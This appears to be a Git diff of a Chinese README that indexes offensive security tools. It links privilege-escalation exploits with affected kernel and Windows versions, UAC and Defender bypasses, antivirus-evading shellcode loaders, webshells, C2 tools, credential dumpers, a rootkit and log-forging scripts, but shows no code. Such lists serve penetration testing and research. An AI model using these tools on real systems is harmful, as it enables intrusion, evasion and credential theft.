Polkit 权限提升漏洞(pkexec)](https://github.com/berdav/CVE-2021-4034)|[PwnKit:cve-2021-4034,可获得交互式shell或者执行单个命令](https://github.com/ly4k/PwnKit)|[cve-2021-4034:单命令执行版本](https://github.com/wudicainiao/cve-2021-4034)|[CVE-2021-4034-NoGCC:CVE-2021-4034简单优化,以应对没有安装gcc和make的目标环境](https://github.com/EstamelGG/CVE-2021-4034-NoGCC) -- [【Windows 提权】CVE-2022-21882:win32k LPE bypass 
CVE-2021-1732](https://github.com/KaLendsi/CVE-2022-21882)|[又一个CVE-2022-21882提权工具](https://github.com/L4ys/CVE-2022-21882) -- [【Windows 提权】CVE-2022-21999:Windows 打印机提权漏洞(此漏洞是去年打印机提权漏洞Printnightmare的续集)](https://github.com/ly4k/SpoolFool) -- [【Windows 提权】CVE-2022-29072:7-Zip帮助页面命令注入漏洞](https://github.com/kagancapar/CVE-2022-29072) +- [【windows提权 Windows 7/10 x64】利用有漏洞的技嘉驱动程序来加载恶意的驱动程序提升权限或干掉驱动级保护的杀软](https://github.com/alxbrn/gdrv-loader)|[备份地址](https://github.com/Mr-xn/gdrv-loader) +- [【windows提权】byeintegrity-uac:通过劫持位于本机映像缓存中的DLL绕过UAC(Windows 7 build 7600 至最新版本)](https://github.com/AzAgarampur/byeintegrity-uac) +- [【Windows 提权 Windows 10/11, Server 2019/2022】InstallerFileTakeOver:Windows Installer 本地提权漏洞PoC](https://github.com/klinix5/InstallerFileTakeOver) +- [【Linux 提权】CVE-2021-4034:Linux Polkit pkexec 权限提升漏洞(所有主流Linux发行版,polkit < 0.120)](https://github.com/berdav/CVE-2021-4034)|[PwnKit:cve-2021-4034,可获得交互式shell或者执行单个命令](https://github.com/ly4k/PwnKit)|[cve-2021-4034:单命令执行版本](https://github.com/wudicainiao/cve-2021-4034)|[CVE-2021-4034-NoGCC:CVE-2021-4034简单优化,以应对没有安装gcc和make的目标环境](https://github.com/EstamelGG/CVE-2021-4034-NoGCC) +- [【Windows 提权 Windows 10 20H2 (build 19042)】CVE-2022-21882:win32k LPE bypass CVE-2021-1732](https://github.com/KaLendsi/CVE-2022-21882)|[又一个CVE-2022-21882提权工具](https://github.com/L4ys/CVE-2022-21882) +- [【Windows 提权】CVE-2022-21999:Windows 打印机提权漏洞,支持所有Windows桌面版本(此漏洞是去年打印机提权漏洞Printnightmare的续集)](https://github.com/ly4k/SpoolFool) +- [【Windows 提权】CVE-2022-29072:7-Zip帮助页面命令注入漏洞(7-Zip 21.07,Windows)](https://github.com/kagancapar/CVE-2022-29072) - [PEASS-ng:提权检测工具,支持 Windows 和 Linux](https://github.com/carlospolop/PEASS-ng) - [【Linux提权】LinEnum:Linux 提权检查脚本](https://github.com/rebootuser/LinEnum) -- [【Windows 提权】sam-the-admin:CVE-2021-42278 and CVE-2021-42287域内提权](https://github.com/WazeHell/sam-the-admin) -- [【Windows 提权】KrbRelayUp:域内提权](https://github.com/Dec0ne/KrbRelayUp) -- [【Windows 提权】Auto-Elevate:通过bypass UAC 和令牌模拟提权到 
system权限](https://github.com/FULLSHADE/Auto-Elevate) -- [【Linux 提权】CVE-2021-4204:Linux Kernel eBPF Local Privilege Escalation](https://github.com/tr3ee/CVE-2021-4204) -- [【Linux 提权】CVE-2022-23222:Linux Kernel eBPF Local Privilege Escalation](https://github.com/tr3ee/CVE-2022-23222) +- [【Windows 提权】sam-the-admin:CVE-2021-42278 and CVE-2021-42287域内提权(Active Directory域环境,2021年11月补丁前)](https://github.com/WazeHell/sam-the-admin) +- [【Windows 提权】KrbRelayUp:域内提权(未强制LDAP签名的默认AD域环境,通用无补丁提权)](https://github.com/Dec0ne/KrbRelayUp) +- [【Windows 提权 Windows 10 21H1】Auto-Elevate:通过bypass UAC 和令牌模拟提权到 system权限](https://github.com/FULLSHADE/Auto-Elevate) +- [【Linux 提权】CVE-2021-4204:Linux Kernel eBPF Local Privilege Escalation(Linux kernel 5.8 - 5.16)](https://github.com/tr3ee/CVE-2021-4204) +- [【Linux 提权】CVE-2022-23222:Linux Kernel eBPF Local Privilege Escalation(Linux kernel 5.15.0 - 5.15.20)](https://github.com/tr3ee/CVE-2022-23222) - [【Windows 提权】PrivExchange:通过滥用Exchange将您的权限交换为域管理权限](https://github.com/dirkjanm/PrivExchange) -- [【Windows 提权】PetitPotam:替代PrintBug用于本地提权的新方式,主要利用MS-EFSR协议中的接口函数](https://github.com/crisprss/PetitPotam) -- [【Windows 提权】DiagTrackEoP:绕过服务账户限制滥用DiagTrack服务与SeImpersonate权限进行权限提升](https://github.com/Wh04m1001/DiagTrackEoP) -- [【Windows 提权】WinPwnage:UAC bypass, Elevate, Persistence methods](https://github.com/rootm0s/WinPwnage) -- [【Windows 提权】CVE-2022-31262:GOG Galaxy LPE Exploit](https://github.com/secure-77/CVE-2022-31262) +- [【Windows 提权】PetitPotam:替代PrintBug用于本地提权的新方式,主要利用MS-EFSR协议中的接口函数(所有Windows Server版本,需MS-EFSR服务)](https://github.com/crisprss/PetitPotam) +- [【Windows 提权 Windows 10/Server 2019】DiagTrackEoP:绕过服务账户限制滥用DiagTrack服务与SeImpersonate权限进行权限提升](https://github.com/Wh04m1001/DiagTrackEoP) +- [【Windows 提权】WinPwnage:UAC bypass, Elevate, Persistence methods(Windows 7 build 7600 - Windows 10,各方法支持的build范围不同)](https://github.com/rootm0s/WinPwnage) +- [【Windows 提权】CVE-2022-31262:GOG Galaxy LPE Exploit(GOG Galaxy 2.0.46 - 
2.0.51,Windows)](https://github.com/secure-77/CVE-2022-31262) - [【Linux】CVE-2021-4034:pkexec 本地提权漏洞](https://github.com/arthepsy/CVE-2021-4034)|[又一个cve-2021-4034](https://github.com/Silencecyber/cve-2021-4034) -- [【Linux 提权】CVE-2021-4154:Linux Kernel 资源管理错误漏洞](https://github.com/Markakd/CVE-2021-4154) -- [【Linux 提权】CVE-2022-34918:netfilter nf_tables 本地提权](https://github.com/veritas501/CVE-2022-34918) -- [【Linux 提权】CVE-2022-1972-infoleak-PoC:Linux-netfilter-越界写入漏洞](https://github.com/randorisec/CVE-2022-1972-infoleak-PoC) -- [【Linux 提权】CVE-2022-32250-exploit](https://github.com/theori-io/CVE-2022-32250-exploit) -- [Elevator:UAC Bypass by abusing RPC and debug objects.](https://github.com/Kudaes/Elevator) -- [【Linux 提权】CVE-2022-2639-PipeVersion](https://github.com/avboy1337/CVE-2022-2639-PipeVersion) -- [【Linux 提权】CVE-2022-2588](https://github.com/Markakd/CVE-2022-2588) -- [【Windows 提权】PetitPotato:通过PetitPotam进行本地提权](https://github.com/wh0Nsq/PetitPotato) -- [LocalPotato:一个使用新potato技术来进行windows本地提权](https://github.com/decoder-it/LocalPotato) -- [EfsPotato:Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)](https://github.com/zcgonvh/EfsPotato) -- [【Linux 提权】CVE-2023-32233: Linux Kernel 权限提升漏洞](https://github.com/Liuk3r/CVE-2023-32233) -- [【Linux 提权】CVE-2023-0386: Linux OverlayFS权限提升漏洞](https://github.com/veritas501/CVE-2023-0386) -- [【Linux提权】CVE-2023-2008: Linux Kernel 权限提升漏洞](https://github.com/bluefrostsecurity/CVE-2023-2008) -- [【win提权】CVE-2023-21752: Windows 备份服务特权提升漏洞](https://github.com/Wh04m1001/CVE-2023-21752) -- [【win提权】CVE-2023-29343: Windows 特权提升漏洞的 SysInternals Sysmon](https://github.com/Wh04m1001/CVE-2023-29343) -- [【Linux提权】CVE2023-1829: Linux Kernel 权限提升漏洞](https://github.com/lanleft/CVE2023-1829) +- [【Linux 提权】CVE-2021-4154:Linux Kernel 资源管理错误漏洞(Linux kernel 5.1 - 5.16,需unprivileged user namespaces)](https://github.com/Markakd/CVE-2021-4154) +- [【Linux 提权】CVE-2022-34918:netfilter 
nf_tables 本地提权(Linux kernel < 5.18.13,需unprivileged user namespaces)](https://github.com/veritas501/CVE-2022-34918) +- [【Linux 提权】CVE-2022-1972-infoleak-PoC:Linux-netfilter-越界写入漏洞(需开启unprivileged user namespaces)](https://github.com/randorisec/CVE-2022-1972-infoleak-PoC) +- [【Linux 提权】CVE-2022-32250-exploit(Linux kernel < 5.18.13,Ubuntu ≤ 22.04未打补丁)](https://github.com/theori-io/CVE-2022-32250-exploit) +- [Elevator:UAC Bypass by abusing RPC and debug objects.(Windows Server 2016/2019, Windows 10/11 x64,build 19045.3570前)](https://github.com/Kudaes/Elevator) +- [【Linux 提权】CVE-2022-2639-PipeVersion(Linux kernel 3.13 - 5.17)](https://github.com/avboy1337/CVE-2022-2639-PipeVersion) +- [【Linux 提权】CVE-2022-2588(Linux kernel 3.17 - 5.18,需user namespaces)](https://github.com/Markakd/CVE-2022-2588) +- [【Windows 提权】PetitPotato:通过PetitPotam进行本地提权(支持所有Windows版本,含Server 2022 21H2)](https://github.com/wh0Nsq/PetitPotato) +- [LocalPotato(CVE-2023-21746):一个使用新potato技术来进行Windows本地提权(Windows 10/11, Server 2019/2022;HTTP/WebDAV场景在打补丁后仍可用)](https://github.com/decoder-it/LocalPotato) +- [EfsPotato:Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)(适用于具有SeImpersonatePrivilege权限的Windows环境)](https://github.com/zcgonvh/EfsPotato) +- [【Linux 提权】CVE-2023-32233: Linux Kernel 权限提升漏洞(Linux kernel < 6.3.1,测试于Ubuntu 23.04 kernel 6.2.0-20-generic)](https://github.com/Liuk3r/CVE-2023-32233) +- [【Linux 提权】CVE-2023-0386: Linux OverlayFS权限提升漏洞(Linux kernel < 6.2)](https://github.com/veritas501/CVE-2023-0386) +- [【Linux提权】CVE-2023-2008: Linux Kernel 权限提升漏洞(Linux kernel < 5.19-rc4,Ubuntu 22.04,需kvm组权限)](https://github.com/bluefrostsecurity/CVE-2023-2008) +- [【win提权】CVE-2023-21752: Windows 备份服务特权提升漏洞(Windows,2023年1月补丁前)](https://github.com/Wh04m1001/CVE-2023-21752) +- [【win提权】CVE-2023-29343: Windows 特权提升漏洞的 SysInternals Sysmon(Sysmon v14.14,2023年4月补丁前)](https://github.com/Wh04m1001/CVE-2023-29343) +- [【Linux提权】CVE2023-1829: Linux Kernel 
权限提升漏洞(Linux kernel 5.15,测试于Ubuntu 22.04 kernel 5.15.0-25.25)](https://github.com/lanleft/CVE2023-1829) +- [【Windows提权 Windows 10/11, Server 2019/2022(含Defender)】RedSun:滥用Windows Defender云标签行为覆盖系统文件并获得管理员权限](https://github.com/Nightmare-Eclipse/RedSun) +- [【Windows Defender DOS】UnDefend:无需管理员权限,被动模式下阻止Defender签名更新,激进模式下在Windows平台更新时完全禁用Windows Defender](https://github.com/Nightmare-Eclipse/UnDefend) +- [【Windows提权】CVE-2026-0827:Lenovo LdeApi.Server.exe 无模拟写文件本地提权漏洞——低权限用户可创建 NTFS junction 使服务以 SYSTEM 权限向任意位置写文件](https://github.com/ZeroMemoryEx/CVE-2026-0827) +- [【Linux提权】CVE-2026-31431:Linux Copy Fail提权](https://github.com/theori-io/copy-fail-CVE-2026-31431) | [CVE-2026-31431](https://github.com/rootsecdev/cve_2026_31431) | [Copy-Fail-CVE-2026-31431-Kubernetes-PoC](https://github.com/Percivalll/Copy-Fail-CVE-2026-31431-Kubernetes-PoC) +- [【Linux提权】Dirty Frag:Universal Linux LPE(CVE-2026-43284 / CVE-2026-43500,影响主流 Linux 发行版)](https://github.com/V4bel/dirtyfrag) +- [【Linux提权】CIFSwitch:利用 cifs.upcall 与 NSS 加载链进行本地提权 PoC](https://github.com/manizada/CIFSwitch) +- [CACM:一款Linux权限维持+后渗透工具,功能涵盖端口扫描、敏感信息、指纹识别、IP伪装、键盘监控、进程隐藏、edr/av识别、权限维持、docker敏感信息扫描、ssh连接伪装等](https://github.com/RuoJi6/CACM) ## PC 
@@ -871,11 +971,11 @@ - [CVE-2020-0674: Internet Explorer远程代码执行漏洞检测](https://github.com/binaryfigments/CVE-2020-0674) -- [CVE-2020-8794: OpenSMTPD 远程命令执行漏洞](./CVE-2020-8794-OpenSMTPD%20远程命令执行漏洞.md) +- [CVE-2020-8794: OpenSMTPD 远程命令执行漏洞](./web/CVE-2020-8794-OpenSMTPD%20远程命令执行漏洞.md) - [Linux平台-CVE-2020-8597: PPPD 远程代码执行漏洞](https://github.com/marcinguy/CVE-2020-8597) -- [Windows-CVE-2020-0796:疑似微软SMBv3协议“蠕虫级”漏洞](https://cert.360.cn/warning/detail?id=04f6a686db24fcfa478498f55f3b79ef)|[相关讨论](https://linustechtips.com/main/topic/1163724-smbv3-remote-code-execution-cve-2020-0796/)|[CVE-2020–0796检测与修复](CVE-2020-0796检测与修复.md)|[又一个CVE-2020-0796的检测工具-可导致目标系统崩溃重启](https://github.com/eerykitty/CVE-2020-0796-PoC) +- [Windows-CVE-2020-0796:疑似微软SMBv3协议“蠕虫级”漏洞](https://cert.360.cn/warning/detail?id=04f6a686db24fcfa478498f55f3b79ef)|[相关讨论](https://linustechtips.com/main/topic/1163724-smbv3-remote-code-execution-cve-2020-0796/)|[CVE-2020–0796检测与修复](./pc/CVE-2020-0796检测与修复.md)|[又一个CVE-2020-0796的检测工具-可导致目标系统崩溃重启](https://github.com/eerykitty/CVE-2020-0796-PoC) - [WinRAR 代码执行漏洞 (CVE-2018-20250)-POC](https://github.com/Ridter/acefile)|[相关文章](https://research.checkpoint.com/2019/extracting-code-execution-from-winrar/)|[全网筛查 WinRAR 代码执行漏洞 (CVE-2018-20250)](https://xlab.tencent.com/cn/2019/02/22/investigating-winrar-code-execution-vulnerability-cve-2018-20250-at-internet-scale/) 
@@ -931,9 +1031,9 @@ - [【Linux提权】CVE-2021-3560 Local PrivEsc Exploit](https://github.com/swapravo/polkadots)|[CVE-2021-3560-Authentication-Agent](https://github.com/RicterZ/CVE-2021-3560-Authentication-Agent) -- [【windows提权】CVE-2021-1675 Windows Print Spooler远程代码执行漏洞](./CVE-2021-1675.md) +- [【windows提权】CVE-2021-1675 Windows Print Spooler远程代码执行漏洞](./privesc/CVE-2021-1675.md) -- [【Linux提权】CVE-2021-22555: Linux Netfilter本地权限提升漏洞](./CVE-2021-22555.md) +- [【Linux提权】CVE-2021-22555: Linux Netfilter本地权限提升漏洞](./privesc/CVE-2021-22555.md) - [【Linux提权】CVE-2021-33909:Linux kernel 本地提权漏洞](https://github.com/Liang2580/CVE-2021-33909) @@ -941,7 +1041,7 @@ - [【Linux提权】CVE-2021-3490:Linux kernel 缓冲区错误漏洞](https://github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490) -- [【Linux 提权】CVE-2022-2602: Linux io_uring子系统UAF漏洞漏洞利用POC,可用于本地提权](https://github.com/LukeGix/CVE-2022-2602) +- [【Linux 提权】CVE-2022-2602: Linux io_uring子系统UAF漏洞漏洞利用POC,可用于本地提权](https://github.com/LukeGix/CVE-2022-2602)|[CVE-2022-2602-Kernel-Exploit:另一个io_uring UAF内核提权利用](https://github.com/kiks7/CVE-2022-2602-Kernel-Exploit) - [CVE-2021-34473:Microsoft Exchange Server Remote Code Execution](https://github.com/phamphuqui1998/CVE-2021-34473)|[proxyshell-auto:自动化的ProxyShell漏洞利用](https://github.com/Udyz/proxyshell-auto) 
@@ -1045,15 +1145,28 @@ - [CVE-2023-27363: Foxit PDF Reader及Editor任意代码执行漏洞](https://github.com/j00sean/SecBugs/tree/main/CVEs/CVE-2023-27363) +- [CVE-2026-34621:Adobe Acrobat Reader 原型污染与JS注入利用链(CVE-2026-34621/34622/34626),可实现沙箱内特权JS执行及本地文件读取外带](https://github.com/azefzafyoussef/CVE-2026-34621) + - [keepass-password-dumper: CVE-2023-32784 KeePass 信息泄露漏洞](https://github.com/vdohney/keepass-password-dumper) - [百度网盘(7.59.5.104) Windows客户端存在命令注入漏洞](https://mrxn.net/news/baidupan-windows-client-rce.html) +- [【Linux提权】CVE-2026-31431:Copy Fail Linux内核页缓存权限提升漏洞(影响2017年后几乎所有发行版)](https://github.com/theori-io/copy-fail-CVE-2026-31431) | [Copy-Fail-CVE-2026-31431-Kubernetes-PoC](https://github.com/Percivalll/Copy-Fail-CVE-2026-31431-Kubernetes-PoC) + +- [【Linux提权】CVE-2026-43284/CVE-2026-43500:Dirty Frag Linux内核页缓存写漏洞](https://github.com/Percivalll/Dirty-Frag-Kubernetes-PoC)|[dirty-frag-check:漏洞检测工具](https://github.com/haydenjames/dirty-frag-check) + +- [【Linux提权】CVE-2026-46300:Fragnesia Linux内核提权漏洞](https://github.com/Sentebale/CVE-2026-46300)|[另一个CVE-2026-46300利用](https://github.com/0xBlackash/CVE-2026-46300) + ## tools-小工具集版本合 +- [RAPTOR(递归自主渗透测试与观测机器人):基于 Claude Code 的自主攻防安全研究框架,可自动完成代码攻击面分析、Semgrep/CodeQL 漏洞扫描、AFL 模糊测试、漏洞分析与 PoC 生成、自动补丁修复及结构化报告输出的全流程渗透测试](https://github.com/gadievron/raptor) +- [Pentest-Swarm-AI:基于多智能体协作的自动化渗透测试框架](https://github.com/Armur-Ai/Pentest-Swarm-AI) +- [anything-analyzer:全场景抓包 + AI 自动分析工具,支持网页/桌面应用/终端/脚本/手机/IoT 等所有来源流量统一汇入同一 Session,一键生成协议逆向/安全审计/JS 加密逆向报告,并内置 MCP Server 可被 Claude Desktop、Cursor 等直接调用](https://github.com/Mouseww/anything-analyzer) +- [nano-analyzer:基于 LLM 的轻量级零日漏洞扫描器,通过三阶段 AI 流水线(上下文生成→漏洞扫描→怀疑性分类)对源代码进行安全审计](https://github.com/weareaisle/nano-analyzer) +- [Payloader:中英双语的交互式安全载荷参考平台,涵盖 Web 应用安全与内网渗透,包含 300+ 条精心编排的攻防载荷、攻击链可视化、工具命令集(Nmap/SQLMap/Burp/Metasploit)和编解码工具](https://github.com/3516634930/Payloader) - [java环境下任意文件下载情况自动化读取源码的小工具](https://github.com/Artemis1029/Java_xmlhack) - [Linux SSH登录日志清除/伪造](./tools/ssh) - 
[python2的socks代理](./tools/s5.py) @@ -1083,9 +1196,11 @@ - [sqlmap_bypass_空格替换成换行符-某企业建站程序过滤_tamper](./tools/sqlmap_bypass_空格替换成换行符-某企业建站程序过滤_tamper.py) - [sqlmap_bypass_云锁_tamper](./tools/sqlmap_bypass_云锁_tamper.py) - [sqlmap bypass云锁tamper(利用云锁的注释不拦截缺陷,来自t00ls师傅)](https://github.com/Hsly-Alexsel/Bypass)-[t00ls原文地址](https://www.t00ls.net/thread-57788-1-1.html)|[项目留存PDF版本](./books/10种方法绕过云锁以及tamper.pdf) +- [ByPassTamperPlus:针对SQLMap开发的加强版Tamper脚本集合,通过利用特定数据库版本特性和高级混淆技术绕过现代WAF防护,支持MSSQL、MySQL和Oracle](https://github.com/Tas9er/ByPassTamperPlus) - [masscan+nmap扫描脚本](./tools/masscan%2Bnmap.py) - [PHP解密扩展](https://github.com/Albert-Zhan/php-decrypt) - [linux信息收集/应急响应/常见后门检测脚本](https://github.com/al0ne/LinuxCheck) +- [ProcIR-Windows 应急响应进程排查工具,面向安全工程师的一键式应急响应工具,快速定位木马、后门、持久化、白加黑、内存注入等威胁](https://github.com/dogadmin/ProcIR) - [RdpThief-从远程桌面客户端提取明文凭据辅助工具](https://github.com/0x09AL/RdpThief) - [使用powershell或CMD直接运行命令反弹shell](https://github.com/ZHacker13/ReverseTCPShell) - [GitHack-.git泄露利用脚本](https://github.com/lijiejie/GitHack) 
@@ -1105,7 +1220,7 @@ - [内网常见渗透工具包](https://github.com/yuxiaokui/Intranet-Penetration) - [从内存中加载 SHELLCODE bypass AV查杀](https://github.com/brimstone/go-shellcode)|[twitter示例](https://twitter.com/jas502n/status/1213847002947051521) - [流量转发工具-pingtunnel是把tcp/udp/sock5流量伪装成icmp流量进行转发的工具](https://github.com/esrrhs/pingtunnel) -- [内网渗透-创建Windows用户(当net net1 等常见命令被过滤时,一个文件执行直接添加一个管理员【需要shell具有管理员权限l】](https://github.com/newsoft/adduser)|[adduser使用方法](./adduser添加用户.md) |[【windows】绕过杀软添加管理员用户的两种方法](https://github.com/lengjibo/RedTeamTools/tree/master/windows/bypass360%E5%8A%A0%E7%94%A8%E6%88%B7)|[【windows】使用vbs脚本添加管理员用户](./使用vbs脚本添加管理员用户.md) +- [内网渗透-创建Windows用户(当net net1 等常见命令被过滤时,一个文件执行直接添加一个管理员【需要shell具有管理员权限l】](https://github.com/newsoft/adduser)|[adduser使用方法](./privesc/adduser添加用户.md) |[【windows】绕过杀软添加管理员用户的两种方法](https://github.com/lengjibo/RedTeamTools/tree/master/windows/bypass360%E5%8A%A0%E7%94%A8%E6%88%B7)|[【windows】使用vbs脚本添加管理员用户](./privesc/使用vbs脚本添加管理员用户.md) - [NetUser-使用windows api添加用户,可用于net无法使用时(支持Nim版本)](https://github.com/lengjibo/NetUser) - [pypykatz-通过python3实现完整的Mimikatz功能(python3.6+)](https://github.com/skelsec/pypykatz) - [【windows】Bypassing AV via in-memory PE execution-通过在内存中加载多次XOR后的payload来bypass杀软](https://blog.dylan.codes/bypassing-av-via/)|[作者自建gitlab地址](https://git.dylan.codes/batman/darkarmour) 
@@ -1175,7 +1290,7 @@ - [【Android 移动app渗透】之一键提取APP敏感信息](https://github.com/TheKingOfDuck/ApkAnalyser) - [【android 移动app渗透】apkleaks-扫描APK文件提取URL、终端和secret](https://github.com/dwisiswant0/apkleaks) - [ShiroExploit-Deprecated-Shiro系列漏洞检测GUI版本-ShiroExploit GUI版本](https://github.com/feihong-cs/ShiroExploit-Deprecated) -- [通过phpinfo获取cookie突破httponly](./通过phpinfo获取cookie突破httponly.md) +- [通过phpinfo获取cookie突破httponly](./web/通过phpinfo获取cookie突破httponly.md) - [phpstudy RCE 利用工具 windows GUI版本](https://github.com/aimorc/phpstudyrce) - [WebAliveScan-根据端口快速扫描存活的WEB](https://github.com/broken5/WebAliveScan) - [bscan-bscan的是一款强大、简单、实用、高效的HTTP扫描器。(WebAliveScan的升级版本)](https://github.com/broken5/bscan) @@ -1565,7 +1680,7 @@ - [Sec-Tools:一款基于Python-Django的多功能Web安全渗透测试工具,包含漏洞扫描,端口扫描,指纹识别,目录扫描,旁站扫描,域名扫描等功能](https://github.com/jwt1399/Sec-Tools) - [Fvuln:漏洞批量扫描集合工具(闭源)](https://github.com/d3ckx1/Fvuln) - [MySQL_Fake_Server:用于渗透测试过程中的假MySQL服务器,纯原生python3实现,不依赖其它包](https://github.com/fnmsd/MySQL_Fake_Server) -- [ysomap:一款适配于各类实际复杂环境的Java反序列化利用框架,可动态配置具备不同执行效果的Java反序列化利用链payload,以应对不同场景下的反序列化利用](https://github.com/wh1t3p1g/ysomap) +- [ysomap:一款适配于各类实际复杂环境的Java反序列化利用框架,可动态配置具备不同执行效果的Java反序列化利用链payload,以应对不同场景下的反序列化利用](https://github.com/wh1t3p1g/ysomap)|[ysogate:Java反序列化利用工具,集成多种利用链和绕过方式](https://github.com/H4cking2theGate/ysogate) - [CobaltStrike_CNA:使用多种WinAPI进行权限维持的CobaltStrike脚本,包含API设置系统服务,设置计划任务,管理用户等(CVE-2020-0796+CVE-2020-0787)](https://github.com/yanghaoi/CobaltStrike_CNA) - [webshell-bypassed-human:过人 webshell 的生成工具](https://github.com/Macr0phag3/webshell-bypassed-human) - [BlueShell:一个Go语言编写的持续远控工具,拿下靶机后,根据操作系统版本下载部署对应的bsClient,其会每隔固定时间向指定的C&C地址发起反弹连接尝试,在C&C端运行bsServer即可连接bsClient,从而实现对靶机的持续控制](https://github.com/whitehatnote/BlueShell) 
@@ -1669,6 +1784,7 @@ - [AgentInjectTool:改造BeichenDream/InjectJDBC加入shiro获取key和修改key功能](https://github.com/SummerSec/AgentInjectTool) - [ByPassBehinder4J:冰蝎Java WebShell免杀生成](https://github.com/Tas9er/ByPassBehinder4J) - [ecapture:通过 hook ebpf 技术,无需CA证书,进行HTTPS的明文通讯抓包、bash 命令捕获和 MySQL query 等数据库审计](https://github.com/ehids/ecapture) +- [Wireshark-MCP:基于 MCP Server 将 tshark 转化为结构化分析接口,让 AI 助手直接分析 pcap 数据包文件,支持 Claude Desktop、Cursor 等 MCP 兼容客户端](https://github.com/bx33661/Wireshark-MCP) - [udpme:从协议层面借助 EDNS0 过滤掉有问题的 UDP 报文](https://github.com/IrineSistiana/udpme) - [FirmWire:支持三星和联发科的全系统基带固件分析平台](https://github.com/FirmWire/FirmWire) - [apache-afl:使用 AFL++ 对 Apache httpd 进行 Fuzz 的自动化配置](https://github.com/0xbigshaq/apache-afl) @@ -1692,6 +1808,7 @@ - [tetanus:用 rust 开发的一款针对 Windows 和Linux 的 C2 工具](https://github.com/MythicAgents/tetanus) - [mortar:可有效规避安全产品的检测 shellcode 加载器](https://github.com/0xsp-SRD/mortar) - [go-mitmproxy:用 Golang 实现的中间人攻击,解析、监测、篡改 HTTP/HTTPS 流量](https://github.com/lqqyt2423/go-mitmproxy) +- [Rockxy:macOS 开源 HTTP 调试代理工具,支持拦截 HTTP/HTTPS 流量、检查 API 请求、调试 WebSocket 连接及分析 GraphQL 查询,基于 Swift/SwiftNIO 构建](https://github.com/LocNguyenHuu/Rockxy) - [dll_inject_vs_binaries:将 dll 注入指定进程](https://github.com/mrd0x/dll_inject_vs_binaries) - [go4Hacker:golang 编写支持 DNSLOG、HTTPLOG、Rebinding和多用户的工具,支持 docker 一键部署](https://github.com/hktalent/go4Hacker) - [GetMail:利用NTLM Hash读取Exchange邮件](https://github.com/b0bac/GetMail) 
@@ -1822,6 +1939,7 @@ - [python-shellcode-loader:python免杀shellcode加载器 加密混淆](https://github.com/HZzz2/python-shellcode-loader) - [go-shellcode-loader:GO免杀shellcode加载器混淆AES加密](https://github.com/HZzz2/go-shellcode-loader) - [ThinkphpGUI:Thinkphp(GUI)漏洞利用工具,支持各版本TP漏洞检测,命令执行,getshell和日志泄露检查](https://github.com/Lotus6/ThinkphpGUI) +- [ThinkPHPGUI:使用JavaFX编写的ThinkPHP的GUI漏洞检测利用工具](https://github.com/AgonySec/ThinkPHPGUI) - [webprobe:一款快速探测web存活并获取title的工具](https://github.com/damit5/webprobe) - [CHAOS:开源远控管理工具](https://github.com/tiagorlampert/CHAOS) - [gitdorks_go:一款在github上发现敏感信息的自动化收集工具](https://github.com/damit5/gitdorks_go) @@ -1942,6 +2060,7 @@ - [wsMemShell:一种全新的内存马](https://github.com/veo/wsMemShell) - [WeblogicExploit-GUI:Weblogic漏洞利用图形化工具 支持注入内存马、一键上传webshell、命令执行](https://github.com/sp4zcmd/WeblogicExploit-GUI) - [BOF-RegSave:使用BOF转储 SAM / SECURITY / SYSTEM 注册表配置单元](https://github.com/EncodeGroup/BOF-RegSave) +- [BlueSAM:BlueHammer 的 Cobalt Strike BOF 移植版,通过 Windows Defender 更新/VSS 行为获取 SAM 数据库副本并在 Beacon 中离线解析注册表](https://github.com/incursi0n/BlueSAM) - [SharpToken:.NET版本的incognito,具有以下功能:枚举Token、从指定进程枚举Token、获得交互式shell、获取命令执行结果(webshell下执行)](https://github.com/BeichenDream/SharpToken) - [qsocks:基于 quic 的 socks5代理工具](https://github.com/net-byte/qsocks) - [CallStackSpoofer:用于在进行系统调用时欺骗任意调用堆栈的 PoC 实现(例如,通过 NtOpenProcess 获取句柄)](https://github.com/countercept/CallStackSpoofer) 
@@ -2126,6 +2245,7 @@ - [go-memorydll:内存 dll 的 go 包装器](https://github.com/nkbai/go-memorydll) - [SQLJam:一个探索数据库查询新方法的 jam 项目](https://github.com/bvisness/SQLJam) - [Webpackfind:类似Packer-Fuzzer的Webpack自动化信息收集工具](https://github.com/xz-zone/Webpackfind) +- [Webpack_extract:自动化收集js、自动化加载js、自动化分析js的Chrome插件](https://github.com/xz-zone/Webpack_extract) - [estk:查询和备份各种 Elasticsearch 和 Kibana 版本的数据工具](https://github.com/LeakIX/estk) - [webcgi-exploits:多语言 Web CGI 接口漏洞利用](https://github.com/wofeiwo/webcgi-exploits) - [TripleCross:A Linux eBPF rootkit with a backdoor](https://github.com/h3xduck/TripleCross) @@ -2190,6 +2310,7 @@ - [IDOR_detect_tool:一款API水平越权漏洞检测工具](https://github.com/y1nglamore/IDOR_detect_tool) - [URLFinder:类似JSFinder的golang实现,一款用于快速提取检测页面中JS与URL的工具,更快更全更舒服](https://github.com/pingc0y/URLFinder) - [go_proxy_pool:无环境依赖开箱即用的代理IP池](https://github.com/pingc0y/go_proxy_pool) +- [zenproxy:代理池管理与转发服务,支持代理订阅管理、质量检测与多IP并发出口](https://github.com/streetartist/zenproxy) - [SmallProxyPool:一个免费高质量的小代理池(从fofa搜索开放socks5代理)](https://github.com/Ggasdfg321/SmallProxyPool) - [NucleiTP:自动整合全网Nuclei的漏洞POC,实时同步更新最新POC](https://github.com/ExpLangcn/NucleiTP) - [Amsi-Killer:Lifetime AMSI bypass-终极AMSI bypass](https://github.com/ZeroMemoryEx/Amsi-Killer) 
